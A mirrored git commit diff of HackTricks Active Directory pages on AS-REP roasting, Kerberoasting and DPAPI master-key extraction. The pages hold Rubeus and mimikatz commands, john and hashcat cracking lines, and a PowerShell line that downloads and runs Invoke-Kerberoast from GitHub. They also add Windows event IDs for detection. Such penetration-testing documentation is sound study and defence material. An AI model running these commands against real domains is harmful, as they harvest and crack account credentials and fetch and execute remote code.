Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 21:53:54 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3378] No subject

Browse source
This commit is contained in:
CPol 2022-08-14 16:19:49 +00:00 committed by gitbook-bot
parent 6f306e112c
commit f175b5122f
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 21 additions and 11 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
windows-hardening/active-directory-methodology/asreproast.md
View file

@ -50,11 +50,15 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
{% code title="Using Windows" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}
{% hint style="warning" %}
AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
{% endhint %}
### Cracking
```

24
windows-hardening/active-directory-methodology/kerberoast.md
View file

@ -1,4 +1,4 @@
# Kerberoast
<details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Kerberoast
## Kerberoast
The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
@ -50,14 +49,24 @@ Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current f
{% code title="From Windows" %}
```bash
# Powerview
Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```
{% endcode %}
## Cracking
{% hint style="warning" %}
When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
{% endhint %}
### Cracking
```
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
@ -65,7 +74,7 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
## Persistence
### Persistence
If you have **enough permissions** over a user you can **make it kerberoastable**:
@ -77,7 +86,7 @@ You can find useful **tools** for **kerberoast** attacks here: [https://github.c
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate <IP of DC>`
## Mitigation
### Mitigation
Kerberoast is very stealthy if exploitable
@ -98,7 +107,6 @@ Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{
**More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -114,5 +122,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

2
windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
View file

@ -117,7 +117,7 @@ For where you can extract the master key with mimikatz:
<pre class="language-bash"><code class="lang-bash"><strong># If you know the users password
</strong><strong>dpapi::masterkey /in:"C:\Users\&#x3C;username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /sid:S-1-5-21-2552734371-813931464-1050690807-1106 /password:123456 /protected
</strong><strong>
</strong><strong># If you don't have the users password and inside an AD
</strong><strong># If you don't
</strong>dpapi::masterkey /in:"C:\Users\&#x3C;username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /rpc</code></pre>
The master key of the file will appear in the output.